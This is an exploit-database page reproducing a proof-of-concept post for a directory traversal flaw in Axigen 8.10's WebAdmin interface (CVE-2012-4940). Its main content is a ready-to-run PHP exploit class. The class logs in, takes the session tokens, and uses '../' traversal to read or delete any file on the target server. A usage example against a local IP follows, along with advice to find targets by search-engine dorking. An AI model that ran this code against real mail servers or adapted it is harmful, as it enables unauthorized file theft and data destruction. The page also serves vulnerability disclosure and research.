Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Axigen 8.10 Directory Traversal

🗓️ 07 Mar 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 347 Views

Axigen 8.10 has a directory traversal vulnerability in the WebAdmin interface allowing unauthorized file access.

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2012-4940
31 Oct 201200:00
circl
Check Point Advisories		Axigen Arbitrary File Read and Delete (CVE-2012-4940)
9 Jun 201300:00
checkpoint_advisories
CVE		CVE-2012-4940
31 Oct 201219:00
cve
Cvelist		CVE-2012-4940
31 Oct 201219:00
cvelist
Metasploit		Axigen Arbitrary File Read and Delete
13 Mar 201310:52
metasploit
Nuclei		Axigen Mail Server Filename Directory Traversal
6 Jun 202603:01
nuclei
NVD		CVE-2012-4940
31 Oct 201219:55
nvd
Packet Storm		Axigen Arbitrary File Read And Delete
31 Aug 202400:00
packetstorm
Prion		Directory traversal
31 Oct 201219:55
prion
CERT		Axigen Mail Server directory traversal vulnerability
31 Oct 201200:00
cert
Rows per page
=============================================================================================================================================
    | # Title     : Axigen 8.10 WebAdmin interface Directory Traversal Vulnerability                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.axigen.com/press/release-notes/axigen-810_83.html                                                               |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: Directory Traversal vulnerability in Axigen's WebAdmin interface.
    
        It can be used to test and exploit the mentioned vulnerability through Axigen WebAdmin web interface to read or delete any file on the target server if the login credentials are correct.
       
       (Related : https://packetstorm.news/files/id/180853/ Linked CVE numbers:	CVE-2012-4940 ) .
    	
    [+] save code as poc.php.
    
    [+] Set target : line 125
    
    [+] PayLoad :
    
    <?php
    
    class AxigenExploit
    {
        private $target;
        private $username;
        private $password;
        private $session;
        private $token;
        private $traversal = str_repeat('../', 10);
    
        public function __construct($target, $username, $password)
        {
            $this->target = rtrim($target, '/');
            $this->username = $username;
            $this->password = $password;
        }
    
        public function exploit($file, $action = 'read')
        {
            if (!$this->login()) {
                die("[-] فشل تسجيل الدخول، تحقق من بيانات الاعتماد.\n");
            }
    
            $filePath = $this->traversal . ltrim($file, '/');
    
            if ($action == 'read') {
                return $this->readFile($filePath);
            } elseif ($action == 'delete') {
                return $this->deleteFile($filePath);
            } else {
                die("[-] الإجراء غير معروف.\n");
            }
        }
    
        private function login()
        {
            echo "[*] محاولة تسجيل الدخول...\n";
    
            $data = http_build_query([
                'username' => $this->username,
                'password' => $this->password,
                'submit'   => 'Login',
                'action'   => 'login'
            ]);
    
            $response = $this->sendRequest('/', 'POST', $data);
    
            if ($response && preg_match('/_h=([a-f0-9]*)/', $response, $matches)) {
                $this->token = $matches[1];
    
                preg_match('/_hadmin=([a-f0-9]*)/', $response, $sessionMatch);
                $this->session = $sessionMatch[1] ?? null;
    
                echo "[+] تسجيل الدخول ناجح.\n";
                return true;
            }
    
            return false;
        }
    
        private function readFile($file)
        {
            echo "[*] محاولة قراءة الملف: $file...\n";
    
            $response = $this->sendRequest('/sources/logging/page_log_file_content.hsp', 'GET', null, [
                '_h'       => $this->token,
                'fileName' => $file
            ]);
    
            if ($response) {
                echo "[+] محتوى الملف:\n$response\n";
            } else {
                echo "[-] فشل استرجاع الملف.\n";
            }
        }
    
        private function deleteFile($file)
        {
            echo "[*] محاولة حذف الملف: $file...\n";
    
            $response = $this->sendRequest('/', 'GET', null, [
                '_h'       => $this->token,
                'page'     => 'vlf',
                'action'   => 'delete',
                'fileName' => $file
            ]);
    
            if ($response && strpos($response, 'View Log Files') !== false) {
                echo "[+] تم حذف الملف: $file\n";
            } else {
                echo "[-] فشل حذف الملف.\n";
            }
        }
    
        private function sendRequest($path, $method, $postData = null, $getParams = [])
        {
            $url = $this->target . $path;
            if (!empty($getParams)) {
                $url .= '?' . http_build_query($getParams);
            }
    
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    
            if ($method == 'POST') {
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
            }
    
            if ($this->session) {
                curl_setopt($ch, CURLOPT_COOKIE, "_hadmin={$this->session}");
            }
    
            $response = curl_exec($ch);
            curl_close($ch);
    
            return $response;
        }
    }
    
    // مثال على الاستخدام:
    $target = "http://192.168.1.100:9000"; // استبدل بعنوان الهدف
    $username = "admin";
    $password = "password";
    $filePath = "\\windows\\win.ini"; // استبدل بمسار الملف المطلوب
    
    $exploit = new AxigenExploit($target, $username, $password);
    $exploit->exploit($filePath, 'read'); // يمكن استخدام 'delete' لحذف الملف
    
    ?>
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Mar 2025 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 26.4
EPSS0.79815
axigen 8.10 vulnerabilitydirectory traversalwebadmin interfaceunauthorized file accesspoc code
347